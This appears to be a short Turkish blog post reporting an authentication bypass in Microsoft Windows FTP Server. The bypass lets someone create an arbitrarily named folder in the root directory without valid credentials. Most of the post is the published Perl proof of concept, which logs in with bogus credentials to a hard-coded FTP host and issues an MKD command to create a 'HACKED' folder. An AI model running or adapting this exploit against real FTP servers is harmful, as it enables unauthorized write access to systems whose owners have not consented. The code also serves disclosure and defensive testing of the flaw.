.png "English"){kind=small}
Microsoft Windows Ftp Server yazılımının authentication bypass ile kullanıcı ve şifre sorgulaması atlatılarak kök dizinde istenilen isimde klasör oluşturulabilmektedir. Yayınlanan örnek kod aşağıda verilmiştir.
#!/usr/bin/perl
use IO::Socket;
$luser = "evil";
$pass = "hacker";
$mysock = IO::Socket::INET->new(PeerAddr =>'192.168.2.6', PeerPort => '21', Proto => 'tcp');
print "Connecting with a bad credentials. . .\n";
sleep(1);
print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";
print "Making HACKED folder . . .\n";
sleep(2);
print $mysock "MKD HACKED\r\n";
print "DONE . . .\n";
sleep(1);
0 yorum:
Yorum Gönder